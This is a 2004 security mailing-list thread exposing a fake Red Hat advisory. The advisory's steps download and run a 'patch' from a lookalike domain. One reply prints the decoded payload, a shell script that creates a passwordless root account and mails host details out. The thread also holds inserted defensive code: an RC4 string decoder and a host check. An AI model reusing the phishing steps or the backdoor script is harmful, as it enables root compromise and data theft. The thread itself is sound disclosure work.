[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-24 Thread Hugo van der Kooij
-----BEGIN PGP SIGNED MESSAGE-----

Be advised.

The message below is currently going around on the internet. Being unsinged
was the first obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasons to suspect it.

The message was sent from 'University of Texas at Arlington'.

I am sure none of you should be fooled by such a message but others might
be.

And while it lasts you may want to get the file for your own educational
purposes.

Hugo.
- -- Forwarded message --
Date: Sun, 24 Oct 2004 17:22:20 -0500
From: RedHat Security Team <[EMAIL PROTECTED]>
To: *
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"


[logo_rh_home.png]

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you must
make by following these steps:

 *  First download the patch from the Security RedHat mirror: wget
www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
 *  Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
 *  cd fileutils-1.0.6.patch
 *  make
 *  ./inst

Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright (C) 2004 Red Hat, Inc. All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
fcdKycT5D9E=
=/nEk
-----END PGP SIGNATURE-----

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-25 Thread Feher Tamas
Hello,

Read these:

http://www.redhat.com/security/
http://www.f-secure.com/weblog/#0323

>The message below is currently going around on internet.
>Being unsinged was the fist obvious issue.

Do you really expect a singing security alert from RedHat? I
think the all singing, all dancing security bulletins are a
M$ specialty.

Regards: Tamas Feher.



Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-24 Thread Harry Hoffman
haha, that's pretty funny. If they were going to do something like that 
it should have at least been in a rpm format.

I'm hoping that this doesn't need to be said but if neither
"yum check-update || up2date -l" report anything then chances are there
are no "Official Fedora Updates"
--Harry

Hugo van der Kooij wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Be advised.
The message below is currently going around on the internet. Being unsinged
was the first obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasons to suspect it.
The message was sent from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but others might
be.
And while it lasts you may want to get the file for your own educational
purposes.
Hugo.
- -- Forwarded message --
Date: Sun, 24 Oct 2004 17:22:20 -0500
From: RedHat Security Team <[EMAIL PROTECTED]>
To: *
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
[logo_rh_home.png]
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges.
Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you must
make by following these steps:
 *  First download the patch from the Security RedHat mirror: wget
www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
 *  Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
 *  cd fileutils-1.0.6.patch
 *  make
 *  ./inst
Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright (C) 2004 Red Hat, Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)
iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
fcdKycT5D9E=
=/nEk
-----END PGP SIGNATURE-----


Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-24 Thread Andrew Farmer
Hugo van der Kooij wrote:
Be advised.
The message below is currently going around on the internet. Being unsinged
was the first obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasons to suspect it.
The message was sent from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but others might
be.
And while it lasts you may want to get the file for your own educational
purposes.

I did a quickie analysis of the program (which is basically just 
distributed as source!).

Strings are encrypted with arcfour; however, as the keys are included 
too, decrypting them is no problem.

pswd[] is an initialization vector for arcfour.
shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$@"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR
opts[], text[], and chk2[] are encrypted with some (apparently 
constant) data retrieved by statting /bin/sh.

To cut to the chase, the whole thing ends up clearing the screen and 
running the following shell script:

#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
echo "This patch must be applied as \"root\", and you are: \"`whoami`\""
exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please wait ..."
sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
 echo "Inca un root frate belea: " >> /tmp/mama
 adduser -g 0 -u 0 -o bash >> /tmp/mama
 passwd -d bash >> /tmp/mama
 ifconfig >> /tmp/mama
 uname -a >> /tmp/mama
 uptime >> /tmp/mama
 sshd >> /tmp/mama
 echo "user bash stii tu" >> /tmp/mama
 cat /tmp/mama | mail -s "Inca o roata" [EMAIL PROTECTED] >> /dev/null
 rm -rf /tmp/mama
 mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi

bla()
{
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 2
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 3
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 4
  echo -n "#"
  sleep 1
  echo -n "#"
  sleep 1
  echo "#"
  sleep 1
}
echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these files."
sleep 1
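The string obfuscation Andrew describes (arcfour with the key shipped right next to the ciphertext) is trivial to undo once you have the source, which is the whole point of his note. What follows is an added example, not code from this thread, from the fake patch or from the k-otik write-up: a plain Python arcfour implementation plus a decoder that walks a table of ciphertext arrays modelled on the shll[]/inlo[]/xecc[]/lsto[] layout. The key bytes and ciphertexts are constructed here by encrypting the strings Andrew recovered, so the block runs offline; the Wikipedia RC4 test vector is included so the cipher itself can be checked independently.

```python
# RC4 (arcfour) recovery of strings obfuscated with an embedded key.
# Added example for analysis purposes; keys and ciphertexts below are
# constructed, not copied from the fake "fileutils" patch.


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by the PRGA XOR stream.
    RC4 is symmetric, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def self_test() -> bool:
    """Known RC4 test vector: key 'Key', plaintext 'Plaintext'."""
    return rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


# A constructed stand-in for the dropper's layout: one key array (the role
# pswd[] plays in the sample) and several ciphertext arrays beside it.
# Built here by encrypting the strings Andrew recovered; with a real sample
# you would copy the byte arrays straight out of the source file.
DEMO_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed
EMBEDDED_STRINGS = {
    "shll": rc4(DEMO_KEY, b"/bin/sh"),
    "inlo": rc4(DEMO_KEY, b"-c"),
    "xecc": rc4(DEMO_KEY, b"exec '%s' \"$@\""),
    "lsto": rc4(DEMO_KEY, b""),
}


def decode_embedded(key: bytes, table: dict) -> dict:
    """Decrypt every array in the table with the key that ships beside it.
    Returns printable text where the result is ASCII, hex otherwise."""
    recovered = {}
    for name, blob in table.items():
        plain = rc4(key, blob)
        try:
            recovered[name] = plain.decode("ascii")
        except UnicodeDecodeError:
            recovered[name] = "<non-ascii: %s>" % plain.hex()
    return recovered


if __name__ == "__main__":
    assert self_test(), "RC4 test vector failed"
    for name, text in decode_embedded(DEMO_KEY, EMBEDDED_STRINGS).items():
        print("%s[] decodes to: %r" % (name, text))
```

Because the key travels with the ciphertext, this kind of encoding hides strings only from a casual `strings` run; any reviewer with the source can recover them with a few dozen lines like these, which is exactly what the analysis in this thread did.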


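The script above leaves three plain traces on a host: a second UID-0 account (adduser -g 0 -u 0 -o bash), that account with its password removed (passwd -d bash), and a nine-level marker directory named ". " under /tmp that it uses to avoid mailing the details twice. The following host check is an added example, not part of this thread or of the k-otik analysis; it scans passwd- and shadow-style text for the two account anomalies and looks for the marker path under a directory you pass in. The passwd and shadow lines are constructed samples, and the demo builds the marker under a temporary directory rather than touching /tmp.

```python
# Host check for the traces the dropper script leaves behind: a second
# UID-0 account ("adduser -g 0 -u 0 -o bash"), an account with no password
# ("passwd -d bash") and the hidden marker directory it creates under /tmp.
# Added example; the passwd/shadow lines below are constructed, not real.
import os
import tempfile

# The script builds /tmp/." "/." "/... : nine nested directories named ". "
MARKER_PARTS = [". "] * 9


def extra_uid0_accounts(passwd_text: str) -> list:
    """Names other than 'root' whose UID field (third field) is 0."""
    hits = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue              # malformed line, not a passwd entry
        if fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def passwordless_accounts(shadow_text: str) -> list:
    """Names whose hash field is empty, which is what 'passwd -d' produces.
    Locked accounts ('*' or '!' in the hash field) are not reported."""
    hits = []
    for line in shadow_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] == "":
            hits.append(fields[0])
    return hits


def marker_dir_present(tmp_root: str = "/tmp") -> bool:
    """True if the script's marker directory exists under tmp_root."""
    return os.path.isdir(os.path.join(tmp_root, *MARKER_PARTS))


def scan(passwd_text: str, shadow_text: str, tmp_root: str = "/tmp") -> dict:
    """Run all three checks and return the findings by name."""
    return {
        "extra_uid0": extra_uid0_accounts(passwd_text),
        "no_password": passwordless_accounts(shadow_text),
        "marker_dir": marker_dir_present(tmp_root),
    }


# Constructed samples of what the two files look like after the script ran.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
hugo:x:500:500:Hugo:/home/hugo:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
"""
SAMPLE_SHADOW = """root:$1$constructed$notarealhash:12700:0:99999:7:::
bin:*:12700:0:99999:7:::
hugo:$1$constructed$notarealhash2:12700:0:99999:7:::
bash::12700:0:99999:7:::
"""


def demo() -> dict:
    """Scan the samples, with the marker built in a throwaway temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, *MARKER_PARTS))
        return scan(SAMPLE_PASSWD, SAMPLE_SHADOW, tmp)


if __name__ == "__main__":
    for check, result in demo().items():
        print("%-12s %r" % (check, result))
```

On a real host you would feed it the contents of /etc/passwd and /etc/shadow (the latter needs root to read) and leave tmp_root at its default. The UID-0 and empty-hash checks are worth running regardless of this particular hoax; the marker path is specific to this sample.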


Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-25 Thread Vincent Archer
On Sun, Oct 24, 2004 at 07:51:09PM -0400, Harry Hoffman wrote:
> haha, that's pretty funny. If they were going to do something like that 
> it should have at least been in a rpm format.

Considering you can put an executable script inside, if I remember right.

> I'm hoping that this doesn't need to be said but if neither
> "yum check-update || up2date -l" report anything then chances are there
> are no "Official Fedora Updates"
> 
> --Harry
> 
> 
> 
> Hugo van der Kooij wrote:
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >Be advised.
> >
> >The message below is currently going around on the internet. Being unsinged
> >was the first obvious issue. Not pointing to RPM updates, being in a
> >different format and such were among the other reasons to suspect it.
> >
> >The message was sent from 'University of Texas at Arlington'.
> >
> >I am sure none of you should be fooled by such a message but others might
> >be.
> >
> >And while it lasts you may want to get the file for your own educational
> >purposes.
> >
> >Hugo.
> >- -- Forwarded message --
> >Date: Sun, 24 Oct 2004 17:22:20 -0500
> >From: RedHat Security Team <[EMAIL PROTECTED]>
> >To: *
> >Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> >
> >
> >[logo_rh_home.png]
> >
> >Original issue date: October 20, 2004
> >Last revised: October 20, 2004
> >Source: RedHat
> >
> >A complete revision history is at the end of this file.
> >
> >Dear RedHat user,
> >
> >Redhat found a vulnerability in fileutils (ls and mkdir), that could
> >allow a remote attacker to execute arbitrary code with root privileges.
> >Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
> >RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
> >known that *BSD and Solaris platforms are NOT affected.
> >
> >The RedHat Security Team strongly advises you to immediately apply the
> >fileutils-1.0.6 patch. This is a critical-critical update that you must
> >make by following these steps:
> >
> > *  First download the patch from the Security RedHat mirror: wget
> >www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
> > *  Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> > *  cd fileutils-1.0.6.patch
> > *  make
> > *  ./inst
> >
> >Again, please apply this patch as soon as possible or you risk your
> >system and others` to be compromised.
> >
> >Thank you for your prompt attention to this serious matter,
> >
> >RedHat Security Team.
> >
> >Copyright (C) 2004 Red Hat, Inc. All rights reserved.
> >
> >
> >-----BEGIN PGP SIGNATURE-----
> >Version: GnuPG v1.2.3 (GNU/Linux)
> >
> >iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7
> >OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo
> >H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL
> >fcdKycT5D9E=
> >=/nEk
> >-----END PGP SIGNATURE-----
> >

-- 
Vincent ARCHER
[EMAIL PROTECTED]

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com



Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-26 Thread Stephen Jimson

The k-otik folks have an analysis of the bad things
that might happen if you follow the instructions in
the fake RedHat advisory that was reported in
yesterday's diary:

http://www.k-otik.com/news/FakeRedhatPatchAnalysis.txt

The source code is also there.

Steph


--- Brett Campbell <[EMAIL PROTECTED]> wrote:

> On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote:
>  
> > I did a quickie analysis of the program (which is basically just 
> > distributed as source!).
> 
> 
> When did you get a hold of the tarball? They must've yanked the record
> for www.fedora-redhat.com ... it can't be resolved in any way.
> 
> Pretty interesting (and pathetic) anyways, nice detective work.
> 
> -- 
> [ Brett R. Campbell ]
>  -> Configuration Management / Systems Administration
>  -> Collaborative Agent Design Research Center
>  -> California Polytechnic State University, SLO, CA
> 






Re: [security] Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

2004-10-26 Thread Brett Campbell
On Sun, Oct 24, 2004 at 06:18:41PM -0700, Andrew Farmer wrote:
 
> I did a quickie analysis of the program (which is basically just 
> distributed as source!).


When did you get a hold of the tarball? They must've yanked the record
for www.fedora-redhat.com ... it can't be resolved in any way.

Pretty interesting (and pathetic) anyways, nice detective work.

-- 
[ Brett R. Campbell ]
 -> Configuration Management / Systems Administration
 -> Collaborative Agent Design Research Center
 -> California Polytechnic State University, SLO, CA
 http://www.cadrc.calpoly.edu/frameset_content/content_about_us.html
